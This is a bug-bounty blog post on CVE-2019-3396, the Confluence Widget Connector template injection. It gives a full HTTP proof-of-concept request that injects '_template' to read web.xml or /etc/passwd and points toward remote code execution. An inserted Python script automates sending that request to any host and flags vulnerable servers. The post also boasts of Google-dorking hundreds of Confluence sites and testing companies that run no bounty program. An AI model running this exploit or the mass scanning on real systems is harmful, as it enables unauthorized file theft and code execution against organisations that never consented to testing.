Long story short, I created my HackerOne/Bugcrowd profiles way back in 2016, but I had never reported a bug there. I had never thought of doing bug hunting, but this vulnerability made me do it.

What was the issue?

SSTI and RCE in Confluence Server via Widget Connector [CVE-2019-3396]: an attacker is able to exploit this issue to achieve path traversal and remote code execution on systems that run a vulnerable version of Confluence Server or Data Center. (Confluence Security Advisory, released 2019-04-17.)

Why is the Widget Connector vulnerable?

The Widget Connector macro lets you embed online videos, slideshows, photostreams and more directly into a page by supplying a URL.

This macro was designed to support content from these sites:

YouTube, Vimeo, MySpace Video, Flickr, Twitter, Slide Rocket, Google Calendar, etc.

Example Vulnerable Code:

The Widget Connector defines several renderers, for example FriendFeedRenderer:

    public class FriendFeedRenderer implements WidgetRenderer {
        ...
        public String getEmbeddedHtml(String url, Map<String, String> params) {
            // params is the map built from the macro call; it is handed straight to Velocity
            params.put("_template", "com/atlassian/confluence/extra/widgetconnector/templates/simplejscript.vm");
            return this.velocityRenderService.render(getEmbedUrl(url), params);
        }
    }

The renderer passes the caller's params map straight to the Velocity render service, and the service takes the template it renders from the _template entry of that map. So an attacker who can put a _template value into the macro parameters controls which file the backend loads and renders as a template.

Steps To Reproduce:

I swear this is the simplest PoC you could ever dream of.

1. Capture a request to the vulnerable Confluence page in Burp (GET or POST, either will do) and send it to Repeater.

2. Modify the captured request as shown below and send it.

Note: You may need to change the request path and add a Referer: header; in most of the cases I tested it was mandatory, and without it the server throws an “XSRF check failed” error.

    POST /rest/tinymce/1/macro/preview HTTP/1.1
    Host: confluence.victim.com
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en-GB;q=0.8,ach;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: https://confluence.victim.com/
    Content-Type: application/json;charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Upgrade-Insecure-Requests: 1
    Content-Length: 163
    Connection: close

    {"contentId":"65601","macro":{"name":"widget","params":{"url":"https://www.youtube.com/watch?v=2aK8hy50fS4","width":"1000","height":"1000","_template":"../web.xml"},"body":""}}

The injected key is _template inside params: the server renders ../web.xml as the widget's template and returns its contents in the preview.

Instead of ../web.xml you can point _template at file:///etc/passwd (or other path traversal payloads) to read arbitrary local files, or at a template containing Velocity directives to turn the template injection into remote code execution and raise the severity of your finding.

Fix:

In fixed versions, doSanitizeParameters is called before the HTML is rendered; it removes _template from the parameters, so the caller can no longer choose the template.
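To make the Steps To Reproduce above scriptable, and to show why the fix works, here is an added example (my code, not from the original post or from Atlassian). It builds the /rest/tinymce/1/macro/preview request from the post, triages the response for evidence that the file named in _template was rendered back, and re-states the server-side fix (dropping _template before rendering) so you can see the injected key disappear. The host and content ID come from the caller; the indicator strings and verdict labels are my own assumptions, as is the choice to always send the Referer header the post says is required.

```python
"""Added example for CVE-2019-3396 (not Atlassian's code, not the post's code):
build the macro preview request, triage the response, mirror the fix."""
import http.client
import json
import ssl
from typing import Dict

PREVIEW_PATH = "/rest/tinymce/1/macro/preview"                # endpoint from the post
DEFAULT_URL = "https://www.youtube.com/watch?v=2aK8hy50fS4"  # widget URL from the post

# Strings that only show up if the named file was read and rendered back.
# These indicator lists are my assumption, not something the post specifies.
WEB_XML_MARKERS = ("<web-app", "<servlet-mapping>", "<servlet-name>")
PASSWD_MARKERS = ("root:x:0:0:", ":/bin/", "/usr/sbin/nologin")


def poc_params(template: str = "../web.xml", url: str = DEFAULT_URL) -> Dict[str, str]:
    """Widget macro params from the post; _template is the injected key."""
    return {"url": url, "width": "1000", "height": "1000", "_template": template}


def build_macro_body(content_id: str, params: Dict[str, str]) -> str:
    """JSON body of the preview call. params is passed through untouched,
    which is exactly the property the vulnerable renderer relies on."""
    payload = {"contentId": content_id,
               "macro": {"name": "widget", "params": params, "body": ""}}
    return json.dumps(payload, separators=(",", ":"))


def build_headers(host: str, body: str) -> Dict[str, str]:
    """Headers from the post's request. The post reports that omitting
    Referer yields 'XSRF check failed', so it is always set here."""
    return {
        "Host": host,
        "Referer": f"https://{host}/",
        "Content-Type": "application/json;charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Content-Length": str(len(body.encode("utf-8"))),
    }


def classify_response(status: int, body: str) -> str:
    """Map a preview response to a verdict (labels are mine):
    blocked        - XSRF/auth rejection; fix Referer or session and retry
    template-read  - the file named in _template came back: vulnerable
    no-indicator   - rendered normally, no sign the template was replaced
    unknown        - anything else; inspect by hand
    """
    if "XSRF check failed" in body or status in (401, 403):
        return "blocked"
    if any(m in body for m in WEB_XML_MARKERS + PASSWD_MARKERS):
        return "template-read"
    if status == 200:
        return "no-indicator"
    return "unknown"


def sanitize_params(params: Dict[str, str]) -> Dict[str, str]:
    """Python re-statement of what the fix's doSanitizeParameters achieves
    per the post: strip the caller-supplied _template so the renderer's own
    template is used. Not Atlassian's implementation."""
    return {k: v for k, v in params.items() if k != "_template"}


def send_preview(host: str, content_id: str, params: Dict[str, str],
                 timeout: float = 10.0, verify_tls: bool = True) -> str:
    """Send one preview request over HTTPS and return the verdict.
    Network call: only run it against hosts you are authorised to test."""
    body = build_macro_body(content_id, params)
    ctx = ssl.create_default_context()
    if not verify_tls:  # self-signed lab instances
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    conn = http.client.HTTPSConnection(host, timeout=timeout, context=ctx)
    try:
        conn.request("POST", PREVIEW_PATH, body=body.encode("utf-8"),
                     headers=build_headers(host, body))
        resp = conn.getresponse()
        return classify_response(resp.status, resp.read().decode("utf-8", "replace"))
    finally:
        conn.close()


if __name__ == "__main__":
    import sys
    # usage: python poc_check.py confluence.victim.com 65601
    print(send_preview(sys.argv[1], sys.argv[2], poc_params()))
```

Run it with a host you are allowed to test and a content ID of any page you can view; a verdict of blocked means the Referer/XSRF issue from the note above (or a missing session), template-read means the instance is vulnerable, and feeding sanitize_params(poc_params()) instead of poc_params() reproduces what a patched server does with the same request.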

Now What?

How do I find other companies affected by this?

Yes, you are right! I got an idea: why don't I Google dork!

I tried “intitle:dashboard-confluence” and was able to find ~100 Confluence links, of which 21 were found vulnerable. Looking at the dork results, I realized that a Confluence link need not necessarily be confluence.companyname.com. So I tried the dorks/keywords below in Google, which gave me around 300+ Confluence links, of which 50+ companies were found vulnerable to this.

I haven't targeted any bounty program sites, yet I received a lot of “recognition” from various companies as bounties in dollars and euros; other companies said they would send me swag as a token of appreciation.

A day I will remember for a very long time. HAPPY HACKING!!!

Smash the clap button if you like this post.

Follow me on twitter for more updates — @vignesh_vault

References: